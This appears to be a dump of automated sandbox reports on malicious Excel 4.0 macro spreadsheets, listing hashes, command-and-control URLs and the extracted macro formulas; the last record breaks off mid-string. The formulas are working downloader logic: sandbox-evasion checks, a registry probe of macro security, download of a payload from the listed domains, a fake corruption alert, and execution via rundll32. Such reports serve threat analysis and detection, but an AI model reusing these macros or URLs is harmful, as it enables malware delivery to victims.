{"version":"0.2","sample":{"sample":"","kind":"file","target":"bdb4faf5cd09ebfaf0efdd36796cf16bdb1ecf3c81a329f2a44de3292bcb535b"},"analysis":{"reported":"2020-04-09T16:18:38Z","score":10},"files":[{"filename":"bdb4faf5cd09ebfaf0efdd36796cf16bdb1ecf3c81a329f2a44de3292bcb535b","filesize":206336,"md5":"b655b438a7e25aea386d50e86c7ce933","sha1":"ea1cb2c5921caa7247dab9615009090cf2d1b305","sha256":"bdb4faf5cd09ebfaf0efdd36796cf16bdb1ecf3c81a329f2a44de3292bcb535b","sha512":"294c971686280e05a0ad203093c14022b891020525dcc699bb53f9d5a24d38e3d6d710809d81990f3a5f635cf44d12a98a58b112b3a8e28d8912f4653963999d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bdb4faf5cd09ebfaf0efdd36796cf16bdb1ecf3c81a329f2a44de3292bcb535b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"rRqE5G0Qqq\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bdc8ab5f81502595d9ec3d744ff1d34740b600cbda6175a5c8fdbaf71d477172"},"analysis":{"reported":"2020-04-09T16:18:38Z","score":10},"files":[{"filename":"bdc8ab5f81502595d9ec3d744ff1d34740b600cbda6175a5c8fdbaf71d477172","filesize":206336,"md5":"94e42eb78aa4ca943e17ce91c606c856","sha1":"d2c0fce2c438e8bffcec765291cf4df29c4a9468","sha256":"bdc8ab5f81502595d9ec3d744ff1d34740b600cbda6175a5c8fdbaf71d477172","sha512":"def077f12fe8eb4ff593d957ba604233cc8b671415a0a70f468723ddbe587a61f434d4a87c4c187fa9f81d4194addf0161bd9b238695b16d6fc5c50e9bf1ed51","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bdc8ab5f81502595d9ec3d744ff1d34740b600cbda6175a5c8fdbaf71d477172.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"TVxwpmd1Xu\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bddd6eb645900a6c5aee112cda6fa943da06cdb656134e1269f8aa18a7845595"},"analysis":{"reported":"2020-04-09T16:18:38Z","score":10},"files":[{"filename":"bddd6eb645900a6c5aee112cda6fa943da06cdb656134e1269f8aa18a7845595","filesize":167936,"md5":"125880974cf18e90a8ac660ae73ca9c9","sha1":"2087b88f841131b57e66a44d4c4dc36a7fca04dd","sha256":"bddd6eb645900a6c5aee112cda6fa943da06cdb656134e1269f8aa18a7845595","sha512":"237e180a596747a38e38a0a2c981cec0dc0f347421f411ac078e850054b231ee5bbae805f3aec5204b30dd820005de84ef6b16c8ef18c38f0d849598c6a76c18","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bddd6eb645900a6c5aee112cda6fa943da06cdb656134e1269f8aa18a7845595.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"cqoJD63QZU\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"be052cba8e419670bad68548c0a65219cd8802710877c90287f2bdbb0d814fe0"},"analysis":{"reported":"2020-04-09T16:18:38Z","score":10},"files":[{"filename":"be052cba8e419670bad68548c0a65219cd8802710877c90287f2bdbb0d814fe0","filesize":160768,"md5":"7523d44d9f500639a2420e3a2956bc3b","sha1":"3c05afdbe5842e56018a9c4645303be147e125c0","sha256":"be052cba8e419670bad68548c0a65219cd8802710877c90287f2bdbb0d814fe0","sha512":"21b5237e50a92992310e8408ca98a199a73edd76aab5e7368761a93c628ab25e652d8065ad91e139c8cbbd2eb1fe18e5c846d81ef625450253a7e7c08e968445","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"be052cba8e419670bad68548c0a65219cd8802710877c90287f2bdbb0d814fe0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"aegrCepQIC\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"be1384dbb88fc628564e3dfd0c7e438f4965164ce26c76ea22b953532787143b"},"analysis":{"reported":"2020-04-09T16:18:38Z","score":10},"files":[{"filename":"be1384dbb88fc628564e3dfd0c7e438f4965164ce26c76ea22b953532787143b","filesize":112128,"md5":"051eef43b6d0cba62d46c53a9e995a34","sha1":"8809483ea562376fa9e80c993f2c4040586bd323","sha256":"be1384dbb88fc628564e3dfd0c7e438f4965164ce26c76ea22b953532787143b","sha512":"9a027ca914d17d70bc8aca8b7d02f9632f517d4859889367a7061c3730669c0397a97f8f9421c888566b292ea4527dd02d86f7bf2c1ef170df1161ba893b87f0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"be1384dbb88fc628564e3dfd0c7e438f4965164ce26c76ea22b953532787143b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"be1884f650c58fc3bf34eee5561d565d4e08e49bc023e3010397bf04f4755923"},"analysis":{"reported":"2020-04-09T16:18:38Z","score":10},"files":[{"filename":"be1884f650c58fc3bf34eee5561d565d4e08e49bc023e3010397bf04f4755923","filesize":209920,"md5":"2ad8e8909fcbd8d3b842b81c3e5f4af3","sha1":"78095c421afe2bbbe705e2c6daccc070e49b91ac","sha256":"be1884f650c58fc3bf34eee5561d565d4e08e49bc023e3010397bf04f4755923","sha512":"bfe3fbbb47f1ba4ecbd1a169a39c6d260346dddfbb6f388686563e0d2168f014c6da526d926cc50d97997715eee26de87532cd9af1d5e2668474df999d9e36d0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"be1884f650c58fc3bf34eee5561d565d4e08e49bc023e3010397bf04f4755923.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"I3uxsQmcyV\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"be298cf8ceac8e485ccee7036de9d9afa5f62afd5ce75070f2a4022e244c7652"},"analysis":{"reported":"2020-04-09T16:18:38Z","score":10},"files":[{"filename":"be298cf8ceac8e485ccee7036de9d9afa5f62afd5ce75070f2a4022e244c7652","filesize":225280,"md5":"9197cfebb508fbcb8bc2fa9743fa2aaf","sha1":"58f222c06042223022ed9d90f4a1f25319ac3b13","sha256":"be298cf8ceac8e485ccee7036de9d9afa5f62afd5ce75070f2a4022e244c7652","sha512":"cc47eecab7e4b5c9f3bcb708ec8b12446fb74d196d535aaf29719edf0ae7930d5bfe9614e143a9048f69e98812654d9fdca9e94c5e15736580e49d194f204c4d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"be298cf8ceac8e485ccee7036de9d9afa5f62afd5ce75070f2a4022e244c7652.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Auw3CASFT4\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"be2f84cce01105e551a933e29645115645621af8d496dfa29cae714a78c499ae"},"analysis":{"reported":"2020-04-09T16:18:38Z","score":10},"files":[{"filename":"be2f84cce01105e551a933e29645115645621af8d496dfa29cae714a78c499ae","filesize":185344,"md5":"e8c749fc6e81d2f7f760577d5c9702e5","sha1":"4e487bc8f57eb8cc4035d7ea0d2bd0b8ae4f351a","sha256":"be2f84cce01105e551a933e29645115645621af8d496dfa29cae714a78c499ae","sha512":"2c95264510884222ba57189e4e693476fd7f78947e400db557179f1ff41790944394cdaa793d4bbff6af136fc7df27a1636fecaceaa5591a610108df7c25ae90","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"be2f84cce01105e551a933e29645115645621af8d496dfa29cae714a78c499ae.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"be3011b6d91794f15c99c16c2d8aafb0ebdaa9998f9bf3d0aadb18971c623a61"},"analysis":{"reported":"2020-04-09T16:18:38Z","score":10},"files":[{"filename":"be3011b6d91794f15c99c16c2d8aafb0ebdaa9998f9bf3d0aadb18971c623a61","filesize":168448,"md5":"169d7af8d536e35820385db30a84bd54","sha1":"c750942ceb828479a1e722fcfb8e2253469e8ab4","sha256":"be3011b6d91794f15c99c16c2d8aafb0ebdaa9998f9bf3d0aadb18971c623a61","sha512":"64101014e1b928c8762347009702596282c945ff2ee0f2d89e3d14ff2382dcb46097ee5fd0e69acfdda616511dab486f6ff3875589c3858b4a13bcb9dd295418","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"be3011b6d91794f15c99c16c2d8aafb0ebdaa9998f9bf3d0aadb18971c623a61.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"LCyGVoSU05\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"be38b45f5b2c81eba7c6ce1f3255042f9b2662beabe4f11ad3de7d091e090f71"},"analysis":{"reported":"2020-04-09T16:18:39Z","score":10},"files":[{"filename":"be38b45f5b2c81eba7c6ce1f3255042f9b2662beabe4f11ad3de7d091e090f71","filesize":185344,"md5":"d8d9946102d1c8c15d60fc011361b3a6","sha1":"773a5978c7d3436893eef4fa88b17c718d62b9fc","sha256":"be38b45f5b2c81eba7c6ce1f3255042f9b2662beabe4f11ad3de7d091e090f71","sha512":"a4f8c363eb30c0c0d3ea28033a142cea62e035c24682aa4e9bbcdfa9704a4016ff026628995126d7187a720def31d18c842648959c917a80111af90cca0cbee1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"be38b45f5b2c81eba7c6ce1f3255042f9b2662beabe4f11ad3de7d091e090f71.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"be40dcfeb56fe998630d6d847ef4b633613ddeebad10eaff0895eb68ca1ba317"},"analysis":{"reported":"2020-04-09T16:18:39Z","score":10},"files":[{"filename":"be40dcfeb56fe998630d6d847ef4b633613ddeebad10eaff0895eb68ca1ba317","filesize":112640,"md5":"5531fa77f2f702707d51e3d81000f1b6","sha1":"5c2d3338fe76f77f19095a07d3ca0f08c7cafaa6","sha256":"be40dcfeb56fe998630d6d847ef4b633613ddeebad10eaff0895eb68ca1ba317","sha512":"ffad67101fda9318f64e9824ed57b3af04d1259948720b748ee40dc07ad5c2ab8e1011b3e28b791f66b13750f13e70c60d5b1efe99ca1df16069e26aad321523","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"be40dcfeb56fe998630d6d847ef4b633613ddeebad10eaff0895eb68ca1ba317.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"be44500d61c16fe31cc25f14e46a715c81cc6989d11bb596cda3c863a2dd5928"},"analysis":{"reported":"2020-04-09T16:18:39Z","score":10},"files":[{"filename":"be44500d61c16fe31cc25f14e46a715c81cc6989d11bb596cda3c863a2dd5928","filesize":144896,"md5":"5e7ec06c455cc857fdc91082ff45cdb2","sha1":"36cac36a7dc6121011507e22ba30539932d52e20","sha256":"be44500d61c16fe31cc25f14e46a715c81cc6989d11bb596cda3c863a2dd5928","sha512":"a34dcd2ccfdb1a4a9043a052fa70d8d76155e556390a41ee80260be34a06d4ddf39981d130de5df4c8db3c41c3cc219dcc56ea4b2cbc9ca8726c7e40352440fa","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"be44500d61c16fe31cc25f14e46a715c81cc6989d11bb596cda3c863a2dd5928.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/1451345341fff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"be60deec65c80dc5adc2a938900504a83fb7457b811a5c53fca723b2e786de0e"},"analysis":{"reported":"2020-04-09T16:18:39Z","score":10},"files":[{"filename":"be60deec65c80dc5adc2a938900504a83fb7457b811a5c53fca723b2e786de0e","filesize":141824,"md5":"8691c00d2d11f521b9f38fbcebb0bb31","sha1":"14509029a89eea12647f47253acf89a9df395cec","sha256":"be60deec65c80dc5adc2a938900504a83fb7457b811a5c53fca723b2e786de0e","sha512":"c2b58410bbc9c1ca2e967f22a4a3befdd1cdbb7456f0de0b34b24ef024dd244a64a8ad5c4ffae5ddf0cfc1d340eb24b6c61e0a72a88a53a445793c7267c62fae","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"be60deec65c80dc5adc2a938900504a83fb7457b811a5c53fca723b2e786de0e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://orruucsl.xyz/fdgareg34g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"cJEi6R8WWQ\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"be6a60f0ae4955888c4187487c80974e0b77c642b7510ac32179a18b8ac11382"},"analysis":{"reported":"2020-04-09T16:18:39Z","score":10},"files":[{"filename":"be6a60f0ae4955888c4187487c80974e0b77c642b7510ac32179a18b8ac11382","filesize":209408,"md5":"ad83c234153bfcfa7b392f7994904ad0","sha1":"5368009e75570d007bd077cdc0b501c82c10277c","sha256":"be6a60f0ae4955888c4187487c80974e0b77c642b7510ac32179a18b8ac11382","sha512":"84a69bd73b5675941176495abc811fe374e6881334453a3b6b2a3a3ba3a8b8d050e9869142479c4d0f71f56e85eba60ee25714d96d03d5155594453782ed433e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"be6a60f0ae4955888c4187487c80974e0b77c642b7510ac32179a18b8ac11382.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Wt93qyDYfl\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"be6b78403a041ab57dd5e213311142548736df2d3111e15ad5a1063fd03abeda"},"analysis":{"reported":"2020-04-09T16:18:39Z","score":10},"files":[{"filename":"be6b78403a041ab57dd5e213311142548736df2d3111e15ad5a1063fd03abeda","filesize":212992,"md5":"e5d112872ed865fe2cfa906a2b2aedc2","sha1":"be8945aba329c402e5c0819b99edbaacf7116fa2","sha256":"be6b78403a041ab57dd5e213311142548736df2d3111e15ad5a1063fd03abeda","sha512":"75d811cecac94c31d0521cbc7807b708b27b0a28181ca26ad069bb7a8c2c222f9e3fdf4468c3f9c23279f8e61e0840318dd70129ec8a34ab2121c927622a430a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"be6b78403a041ab57dd5e213311142548736df2d3111e15ad5a1063fd03abeda.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-front.php","https://cworld.top/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cworld.top/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's 